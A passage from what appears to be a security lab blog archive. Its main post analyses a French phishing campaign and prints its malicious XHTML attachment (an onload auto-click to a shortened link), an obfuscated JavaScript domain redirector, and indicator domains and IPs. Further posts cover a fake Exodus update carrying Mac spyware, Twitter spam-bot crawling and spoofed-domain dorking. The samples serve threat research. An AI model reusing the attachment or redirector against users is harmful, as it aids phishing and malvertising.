The subject of the email follows the prefix of the attachment name. The attachments could be an HTML or a PDF file usually named as “document“, “preuves“, or “fact” which can be followed by underscore and 6 numbers. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf

Here’s an example content of an XHTML attachment from 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>

 

Evolution of the campaign

The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October these payload addresses were further obfuscated by putting them behind redirects. The author has developed a simple Javascript to obfuscate a bunch of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This Javascript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected the users to the payload domain. In this particular campaign, the payload domain has changed to hxxp://email-document-joint[.]pro/redir/.

However, it appears that the use of Javascript code inside attachments was not a huge success as only some days later, the Javascript code for domain deobfuscation and redirection has been moved behind pste.eu, a Pastebin-like service for HTML code. So then the phishing emails thereafter contained links to pste.eu such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution during November, we observed few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site.

At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.

Few days later at 15th of November, the attackers continued to add redirections in between the pste.eu URLs by using Twitter shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents into their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns or products/lotteries etc.

 

The pste.eu links in Twitter

 

Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to 302 redirection chain. The delivery method remained as XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, it seems the payload URLs lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.

 

Infrastructure

The campaign has been observed using mostly compromised Wanadoo email accounts and later email accounts in their own domains such as: rault@3130392E3130322E37322E3734.lho33cefy1g.pw to send out the emails. The subdomain name is the name of the sending email server and is a hex representation of the public IP address of the server, in this case: 109.102.72.74.

The server behind the .pw domain appears to be a postfix email server listed already on multiple blacklists. For compromised email accounts used for sending out the phishing emails, they are always coming from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.

Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.

 

Additional Find

During the investigation we came across an interesting artifact in Virustotal submitted from France. The file is a .zip archive that contained the following

  • All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool containing the checker results. Both .vbs are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.

 

Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails in 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to ZIP up this tool along with the results to Virustotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with Wscript.Echo() alert

 

Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.

 

Indicators

This is a non-exhaustive list of indicators observed during the campaign.

2bv9npptni4u46knazx2.pw
p95jadah5you6bf1dpgm.pw
lho33cefy1g.pw
mail-server-zpqn8wcphgj.pw
http://piecejointe.pro/facture/redirect.php
http://email-document-joint.pro/redir/
l45yvbz21a.website
95plb963jjhjxd.space
sjvmrvovndqo2u.icu
jeu0rgf5apd5337.site
95.222.24.44 - Email Server
109.102.72.74 - Email Server
83.143.150.210 - Email Server
37.60.177.228 - Web Server / Malware C2  
87.236.22.87 Web Server / Malware C2 
207.180.233.109 - Web Server
91.109.5.170 - Web Server
162.255.119.96 - Web Server
185.86.78.238 - Web Server
176.119.157.62 - Web Server
113.181.61.226

The following indicators have been observed but are benign and can cause false positives.

https://pste.eu
https://t.co
Tags:


Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!

 

As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.

 

 

Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.

 


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉



Spam campaign targets Exodus Mac Users

We’ve seen a small spam campaign that attempts to target Mac users that use Exodus, a multi-cryptocurrency wallet.

The theme of the email focuses mainly on Exodus. The attachment was “Exodus-MacOS-1.64.1-update.zip” and the sender domain was “update-exodus[.]io”, suggesting that it wanted to associate itself to the organization. It was trying to deliver a fake Exodus update by using the subject “Update 1.64.1 Release – New Assets and more”. Whereas, the latest released version for Exodus is 1.63.1.

Fake Exodus Update email

Extracting the attached archive leads to the application which was apparently created yesterday.

Spytool’s creation date

The application contains a mach-O binary with the filename “rtcfg”. The legitimate Exodus application, however, uses “Exodus”.

We checked out the strings and found a bunch of references to “realtime-spy-mac[.]com” website.

From the website, the developer described their software as a cloud-based surveillance and remote spy tool. Their standard offering costs $79.95 and comes with a cloud-based account where users can view the images and data that the tool uploaded from the target machine. The strings that was extracted from the Mac binary from the mail spam coincides with the features mentioned in the realtime-spy-mac[.]com tool.

Strings inside the Realtime-Spy tool

Searching for similar instances of the Mac keylogger in our repository yielded to other samples using these filenames:

  • taxviewer.app
  • picupdater.app
  • macbook.app
  • launchpad.app

Based on the spy tool’s website, it appears that it does not only support Mac, but Windows as well. It’s not the first time that we’ve seen Windows threats target Mac. As the crimeware threat actors in Windows take advantage of the cryptocurrency trend, they too seem to want to expand their reach, thus also ended up targeting Mac users.

Indicators of Compromise

SHA1:

  • b6f5a15d189f4f30d502f6e2a08ab61ad1377f6a – rtcfg
  • 3095c0450871f4e1d14f6b1ccaa9ce7c2eaf79d5 – Exodus-MacOS-1.64.1-update.zip
  • 04b9bae4cc2dbaedc9c73c8c93c5fafdc98983aa – picupdater.app.zip
  • c22e5bdcb5bf018c544325beaa7d312190be1030 – taxviewer.app.zip
  • d3150c6564cb134f362b48cee607a5d32a73da66 – launchpad.app.zip
  • bf54f81d7406a7cfe080b42b06b0a6892fcd2f37 – macbook.app.zip

Detection:

  • Monitor:OSX/Realtimespy.b6f5a15d18!Online

Domain:

  • realtime-spy-mac[.]com
  • update-exodus[.]io

 



Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) […]

2018-08-31

Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.” Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure […]

2018-08-14

How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details. And many of the subsequent (non-technical) articles that have been published has focused almost exclusively on […]

2018-07-30

Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.

2018-05-24

Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally. To start with, let’s recap. In my […]

2018-05-04

Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an […]

2018-03-16

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same […]

2018-02-27

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project. “The Scalable and Secure […]

2018-02-26

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, […]

2018-02-16

NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely: “Word2vec takes as its input a large corpus of text and produces a vector space, typically of several […]

2018-01-30
#####EOF##### News from the Lab

Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing amount of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.

Tags:


Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.”

Pwnies2018 The Pwnie Awards

Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure earlier this year. Both MWR and F-Secure have a long history of geek culture. One thing we’ve done for years, is to take our trophies (or “Poikas”) for a trip around the town. For an example, see this.

So, while the Pwnie is still here in Helsinki before going home to UK, we took it around the town!

Pwnie2018 HQ

Pwnie at the F-Secure HQ.

Pwnie2018 Kanava

Pwnie at Ruoholahdenkanava.

Pwnie2018 Harbour

Pwnie at the West Harbour.

Pwnie2018 Baana

Pwnie looks at the Baana.

Pwnie2018 Museum

Pwnie and some Atari 2600s and laptops at the Helsinki computer museum.

Pwnie2018 MIG

Pwnie looking at a Mikoyan-Gurevich MiG-21 supersonic interceptor.

Pwnie2018 Tennispalatsi

Pwnie at the Art Museum.

Pwnie2018 awards

Pwnie chilling on our award shelf.

Pwnie2018 Parliament

Pwnie at the house of parliament.

pwnie2018_tuomiokirkko

Pwnie at the Tuomikirkko Cathedral.

Thanks for all the bugs, MWR!

Mikko

P.S. If you’re wondering about the word “Poika” we use for trophies, here’s a short documentary video that explains it in great detail.

Tags:


How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details.

And many of the subsequent (non-technical) articles that have been published has focused almost exclusively on the fact that McCaskill is running for re-election in 2018. But, is it really conclusive that this hacking attempt was about the 2018 midterms? After all, Senator McCaskill is the top-ranking Democrat on the Homeland Security & Governmental Affairs Committee and also sits on the Armed Services Committee. Perhaps she and her staffers were instead targeted for insights into on-going Senate investigations?

Senator Claire McCaskill's Committee Assignments

Because if you want to target an election campaign, you should target the candidate’s campaign server, not their government accounts. (Elected officials cannot use government accounts/resources for their personal campaigns.) In the case of Senator McCaskill, the campaign server is: clairemccaskill.com.

Which appears to be a WordPress site.

clairemccaskill.com/robots.txt

Running on an Apache server.

clairemccaskill.com Apache error log

And it has various e-mail addresses associated with it.

clairemccaskill.com email addresses

That looks interesting, right? So… let’s do some Google dorking!

Searching for “clairemccaskill.com” in URLs while discarding the actual site yielded a few pages of results.

Google dork: inurl:clairemccaskill.com -site:clairemccaskill.com

And on page two of those results, this…

clairemccaskill.com.de

Definitely suspicious.

Whats is com.de? It’s a domain on the .de TLD (not a TLD itself).

.com.de

Okay, so… what other interesting domains associated with com.de are there to discover?

How about additional US Senators up for re-election such as Florida Senator Bill Nelson? Yep.

nelsonforsenate.com.de

Senator Bob Casey? Yep.

bobcasey.com.de

And Senator Sheldon Whitehouse? Yep.

whitehouseforsenate.com.de

But that’s not all. Democrats aren’t the only ones being spoofed.

Iowa Senate Republicans.

iowasenaterepublicans.com.de

And “Senate Conservatives“.

senateconservatives.com.de

Hmm. Well, while being no more closer to knowing whether or not Senator McCaskill’s government accounts were actually targeted because of the midterm elections – the domains shown above are definitely shady AF. And enough to give cause for concern that the 2018 midterms are indeed being targeted, by somebody.

(Our research continues.)

Meanwhile, the FBI might want to get in touch with the owners of com.de.



Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.



Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally.

To start with, let’s recap. In my previous research, I used a script to recursively query Twitter accounts for specific patterns, and found just over 22,000 Twitter bots using this process. This figure was based on the fact that I concluded my research (stopped my script) after querying only 3000 of the 22,000 discovered accounts. I have a suspicion that my script would have uncovered a lot more accounts, had I let it run longer.

This week, I decided to re-query all the Twitter IDs I found in March, to see if anything had changed. To my surprise, I was only able to query 2895 of the original 21964 accounts, indicating that Twitter has taken action on most of those accounts.

In order to find out whether the culled accounts were deleted or suspended, I wrote a small python script that utilized the requests module to directly query each account’s URL. If the script encountered a 404 error, it indicated that the account was removed or renamed. A reply indicated that the account was suspended. Of the 19069 culled accounts checked, 18932 were suspended, and 137 were deleted/renamed.

I also checked the surviving accounts in a similar manner, using requests to identify which ones were “restricted” (by checking for specific strings in the html returned from the query). Of the 2895 surviving accounts, 47 were set to restricted and the other 2848 were not.

As noted in my previous article, the accounts identified during my research had creation dates ranging from a few days old to over a decade in age. I checked the creation dates of both the culled set and the survivor’s set (using my previously recorded data) for patterns, but I couldn’t find any. Here they are, for reference:

Based on the connectivity I recorded between the original bot accounts, I’ve created a new graph visualization depicting the surviving communities. Of the 2895 survivors, only 402 presumably still belong to the communities I observed back then. The rest of the accounts were likely orphaned. Here’s a representation of what the surviving communities might look like, if the entity controlling these accounts didn’t make any changes in the meantime.

By the way, I’m using Gephi to create these graph visualizations, in case you were wondering.

Erik Ellason (@slickrockweb) contacted me recently with some evidence that the bots I’d discovered might be re-tooling. He pointed me to a handful of accounts that contained the shortened URL in a pinned tweet (instead of in the account’s description). Here’s an example profile:

Fetching a user object using the Twitter API will also return the last tweet that account published, but I’m not sure it would necessarily return the pinned Tweet. In fact, I don’t think there’s a way of identifying a pinned Tweet using the standard API. Hence, searching for these accounts by their promotional URL would be time consuming and problematic (you’d have to iterate through their tweets).

Fortunately, automating discovery of Twitter profiles similar to those Eric showed me was fairly straightforward. Like the previous botnet, the accounts could be crawled due to the fact that they follow each other. Also, all of these new accounts had text in their descriptions that followed a predictable pattern. Here’s an example of a few of those sentences:

look url in last post
go on link in top tweet
go at site in last post

It was trivial to construct a simple regular expression to find all such sentences:

desc_regex = "(look|go on|go at|see|check|click) (url|link|site) in (top|last) (tweet|post)"

I modified my previous script to include the above regular expression, seeded it with the handful of accounts that Eric had provided me, and let it run. After 24 hours, my new script had identified just over 20000 accounts. Mapping the follower/following relationships between these accounts gave me the following graph:

As we zoom in, you’ll notice that these accounts are way more connected than the older botnet. The 20,000 or so accounts identified at this point map to just over 100 separate communities. With roughly the same amount of accounts, the previous botnet contained over 1000 communities.

Zooming in further shows the presence of “hubs” in each community, similar to in our previous botnet.

Given that this botnet showed a greater degree of connectivity than the previous one studied, I decided to continue my discovery script and collect more data. The discovery rate of new accounts slowed slightly after the first 24 hours, but remained steady for the rest of the time it was running. After 4 days, my script had found close to 44,000 accounts.

And eight days later, the total was just over 80,000.

Here’s another way of visualizing that data:


Here’s the size distribution of communities detected for the 80,000 node graph. Smaller community sizes may indicate places where my discovery script didn’t yet look. The largest communities contained over 1000 accounts. There may be a way of searching more efficiently for these accounts by prioritizing crawling within smaller communities, but this is something I’ve yet to explore.

I shut down my discovery script at this point, having queried just over 30,000 accounts. I’m fairly confident this rabbit hole goes a lot deeper, but it would have taken weeks to query the next 50,000 accounts, not to mention the countless more that would have been added to the list during that time.

As with the previous botnet, the creation dates of these accounts spanned over a decade.

Here’s the oldest account I found.

Using the same methodology I used to analyze the survivor accounts from the old botnet, I checked which of these new accounts were restricted by Twitter. There was an almost exactly even split between restricted and non-restricted accounts in this new set.

Given that these new bots show many similarities to the previously discovered botnet (similar avatar pictures, same URL shortening services, similar usage of the English language) we might speculate that this new set of accounts is being managed by the same entity as those older ones. If this is the case, a further hypothesis is that said entity is re-tooling based on Twitter’s action against their previous botnet (for instance, to evade automation).

Because these new accounts use a pinned Tweet to advertise their services, we can test this hypothesis by examining the creation dates of the most recent Tweet from each account. If the entity is indeed re-tooling, all of the accounts should have Tweeted fairly recently. However, a brief examination of last tweet dates for these accounts revealed a rather large distribution, tracing back as far as 2012. The distribution had a long tail, with a majority of the most recent Tweets having been published within the last year. Here’s the last year’s worth of data graphed.

Here’s the oldest Tweet I found:

This data, on it’s own, would refute the theory that the owner of this botnet has been recently retooling. However, a closer look at some of the discovered accounts reveals an interesting story. Here are a few examples.

This account took a 6 year break from Twitter, and switched language to English.

This account mentions a “url in last post” in its bio, but there isn’t one.

This account went from posting in Korean to posting in English, with a 3 year break in between. However, the newer Tweet mentions “url in bio”. Sounds vaguely familiar.

Examining the text contained in the last Tweets from these discovered accounts revealed around 76,000 unique Tweets. Searching these Tweets for links containing the URL shortening services used by the previous botnet revealed 8,200 unique Tweets. Here’s a graph of the creation dates of those particular Tweets.

As we can see, the Tweets containing shortened URLs date back only 21 days. Here’s a distribution of domains seen in those Tweets.

My current hypothesis is that the owner of the previous botnet has purchased a batch of Twitter accounts (of varying ages) and has been, at least for the last 21 days, repurposing those accounts to advertise adult dating sites using the new pinned-Tweet approach.

One final thing – I checked the 2895 survivor accounts from the previously discovered botnet to see if any had been reconfigured to use a pinned Tweet. At the time of checking, only one of those accounts had been changed.

If you’re interested in looking at the data I collected, I’ve uploaded names/ids of all discovered accounts, the follower/following mappings found between these accounts, the gephi save file for the 80,000 node graph, and a list of accounts queried by my script (in case someone would like to continue iterating through the unqueried accounts.) You can find all of that data in this github repo.



Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:

This particular avatar was very commonly used as a profile picture in these accounts.

All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:

  • Check out
  • Check this
  • How do you like my site
  • How do you like me
  • You love it harshly
  • Do you like fast
  • Do you like it gently
  • Come to my site
  • Come in
  • Come on
  • Come to me
  • I want you
  • You want me
  • Your favorite
  • Waiting you
  • Waiting you at

All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:

  • me2url.info
  • url4.pro
  • click2go.info
  • move2.pro
  • zen5go.pro
  • go9to.pro

It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:

“I will ban drugs, spam, porn, etc.” Yeah, right.

My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.

Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.

The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.

